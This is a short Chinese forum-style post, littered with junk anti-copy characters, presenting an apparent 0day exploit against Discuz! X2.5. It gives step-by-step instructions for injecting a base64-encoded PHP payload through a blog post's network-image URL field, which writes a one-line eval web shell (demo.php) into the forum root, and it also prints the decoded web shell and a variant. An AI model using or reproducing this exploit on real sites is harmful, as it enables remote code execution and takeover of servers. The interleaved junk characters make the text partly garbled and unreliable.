DZ X2.5最新0day
1 z9 G1 D# _2 x" ]6 |) J/ _1.注册任意账户9 `+ Z+ t* X! S: }+ q% A8 ~
2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了" Q- X1 W1 e3 E" c
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码& l8 @8 o' J+ j/ e y- `
<?php @eval($_POST[c]); ?>ok
1 v% y7 v, V a- t7 G<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
( C3 [3 T6 V. M" A/ Y9 [4.访问日志,论坛根目录下生成demo.php,一句发密码C |